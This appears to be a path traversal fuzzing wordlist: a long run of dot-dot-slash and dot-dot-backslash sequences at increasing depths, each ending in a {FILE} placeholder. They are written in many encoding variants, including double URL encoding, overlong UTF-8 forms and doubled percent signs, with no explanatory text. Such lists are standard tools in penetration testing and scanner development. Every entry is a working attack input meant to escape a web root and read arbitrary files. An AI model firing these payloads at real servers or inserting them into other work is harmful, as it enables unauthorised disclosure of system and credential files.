-%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE} -%2e%2e%2f{FILE} -%2e%2e%2f%2e%2e%2f{FILE} -%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -..%252f{FILE} -..%252f..%252f{FILE} -..%252f..%252f..%252f{FILE} -..%252f..%252f..%252f..%252f{FILE} -..%252f..%252f..%252f..%252f..%252f{FILE} -..%252f..%252f..%252f..%252f..%252f..%252f{FILE} -..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE} -..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE} -%252e%252e/{FILE} -%252e%252e/%252e%252e/{FILE} -%252e%252e/%252e%252e/%252e%252e/{FILE} -%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE} -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE} -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE} -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE} -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE} -%252e%252e%252f{FILE} -%252e%252e%252f%252e%252e%252f{FILE} -%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -..\{FILE} -..\..\{FILE} -..\..\..\{FILE} -..\..\..\..\{FILE} -..\..\..\..\..\{FILE} -..\..\..\..\..\..\{FILE} -..\..\..\..\..\..\..\{FILE} -..\..\..\..\..\..\..\..\{FILE} -..%255c{FILE} -..%255c..%255c{FILE} -..%255c..%255c..%255c{FILE} -..%255c..%255c..%255c..%255c{FILE} -..%255c..%255c..%255c..%255c..%255c{FILE} -..%255c..%255c..%255c..%255c..%255c..%255c{FILE} -..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE} -..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE} -..%5c..%5c{FILE} -..%5c..%5c..%5c{FILE} -..%5c..%5c..%5c..%5c{FILE} -..%5c..%5c..%5c..%5c..%5c{FILE} -..%5c..%5c..%5c..%5c..%5c..%5c{FILE} -..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE} -..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE} -%2e%2e\{FILE} -%2e%2e\%2e%2e\{FILE} -%2e%2e\%2e%2e\%2e%2e\{FILE} -%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE} -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE} -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE} -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE} -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE} -%2e%2e%5c{FILE} -%2e%2e%5c%2e%2e%5c{FILE} -%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -%252e%252e\{FILE} -%252e%252e\%252e%252e\{FILE} -%252e%252e\%252e%252e\%252e%252e\{FILE} -%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE} -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE} -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE} -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE} -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE} -%252e%252e%255c{FILE} -%252e%252e%255c%252e%252e%255c{FILE} -%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE} -..%c0%af{FILE} -..%c0%af..%c0%af{FILE} -..%c0%af..%c0%af..%c0%af{FILE} -..%c0%af..%c0%af..%c0%af..%c0%af{FILE} -..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE} -..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE} -..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE} -..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE} -%c0%ae%c0%ae/{FILE} -%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE} -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE} -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE} -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE} -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE} -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE} -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE} -%c0%ae%c0%ae%c0%af{FILE} -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE} -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE} -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE} -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE} -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE} -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE} -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE} -..%25c0%25af{FILE} -..%25c0%25af..%25c0%25af{FILE} -..%25c0%25af..%25c0%25af..%25c0%25af{FILE} -..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE} -..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE} -..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE} -..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE} -..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE} -%25c0%25ae%25c0%25ae/{FILE} -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE} -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE} -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE} -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE} -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE} -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE} -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE} -%25c0%25ae%25c0%25ae%25c0%25af{FILE} -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE} -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE} -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE} -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE} -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE} -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE} -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE} -..%c1%9c{FILE} -..%c1%9c..%c1%9c{FILE} -..%c1%9c..%c1%9c..%c1%9c{FILE} -..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE} -..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE} -..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE} -..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE} -..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE} -%c0%ae%c0%ae\{FILE} -%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE} -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE} -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE} -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE} -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE} -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE} -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE} -%c0%ae%c0%ae%c1%9c{FILE} -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE} -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE} -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE} -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE} -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE} -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE} -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE} -..%25c1%259c{FILE} -..%25c1%259c..%25c1%259c{FILE} -..%25c1%259c..%25c1%259c..%25c1%259c{FILE} -..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE} -..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE} -..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE} -..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE} -..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE} -%25c0%25ae%25c0%25ae\{FILE} -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE} -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE} -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE} -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE} -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE} -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE} -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE} -%25c0%25ae%25c0%25ae%25c1%259c{FILE} -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE} -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE} -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE} -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE} -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE} -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE} -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE} -..%%32%66{FILE} -..%%32%66..%%32%66{FILE} -..%%32%66..%%32%66..%%32%66{FILE} -..%%32%66..%%32%66..%%32%66..%%32%66{FILE} -..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE} -..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE} -..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE} -..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE} -%%32%65%%32%65/{FILE} -%%32%65%%32%65/%%32%65%%32%65/{FILE} -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE} -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE} -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE} -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE} -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE} -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE} -%%32%65%%32%65%%32%66{FILE} -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE} -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE} -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE} -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE} -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE} -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE} -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE} -..%%35%63{FILE} -..%%35%63..%%35%63{FILE} -..%%35%63..%%35%63..%%35%63{FILE} -..%%35%63..%%35%63..%%35%63..%%35%63{FILE} -..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE} -..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE} -..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE} -..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE} -%%32%65%%32%65/{FILE} -%%32%65%%32%65/%%32%65%%32%65/{FILE} -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE} -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE} -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE} -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE} -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE} -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE} -%%32%65%%32%65%%35%63{FILE} -%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE} -%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE} -%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE} -%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE} -%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE} -%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE} -%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE} -../{FILE} -../../{FILE} -../../../{FILE} -../../../../{FILE} -../../../../../{FILE} -../../../../../../{FILE} -../../../../../../../{FILE} -../../../../../../../../{FILE} -..%2f{FILE} -..%2f..%2f{FILE} -..%2f..%2f..%2f{FILE} -..%2f..%2f..%2f..%2f{FILE} -..%2f..%2f..%2f..%2f..%2f{FILE} -..%2f..%2f..%2f..%2f..%2f..%2f{FILE} -..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE} -..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE} -%2e%2e/{FILE} -%2e%2e/%2e%2e/{FILE} -%2e%2e/%2e%2e/%2e%2e/{FILE} -%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE} -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE} -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE} -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE} -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE} -%2e%2e%2f{FILE} -%2e%2e%2f%2e%2e%2f{FILE} -%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -..%252f{FILE} -..%252f..%252f{FILE} -..%252f..%252f..%252f{FILE} -..%252f..%252f..%252f..%252f{FILE} -..%252f..%252f..%252f..%252f..%252f{FILE} -..%252f..%252f..%252f..%252f..%252f..%252f{FILE} -..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE} -..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE} -%252e%252e/{FILE} -%252e%252e/%252e%252e/{FILE} -%252e%252e/%252e%252e/%252e%252e/{FILE} -%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE} -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE} -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE} -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE} -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE} -%252e%252e%252f{FILE} -%252e%252e%252f%252e%252e%252f{FILE} -%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE} -..\{FILE} -..\..\{FILE} -..\..\..\{FILE} -..\..\..\..\{FILE} -..\..\..\..\..\{FILE} -..\..\..\..\..\..\{FILE} -..\..\..\..\..\..\..\{FILE} -..\..\..\..\..\..\..\..\{FILE} -..%5c{FILE} -..%5c..%5c{FILE} -..%5c..%5c..%5c{FILE} -..%5c..%5c..%5c..%5c{FILE} -..%5c..%5c..%5c..%5c..%5c{FILE} -..%5c..%5c..%5c..%5c..%5c..%5c{FILE} -..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE} -..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE} -%2e%2e\{FILE} -%2e%2e\%2e%2e\{FILE} -%2e%2e\%2e%2e\%2e%2e\{FILE} -%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE} -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE} -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE} -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE} -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE} -%2e%2e%5c{FILE} -%2e%2e%5c%2e%2e%5c{FILE} -%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} 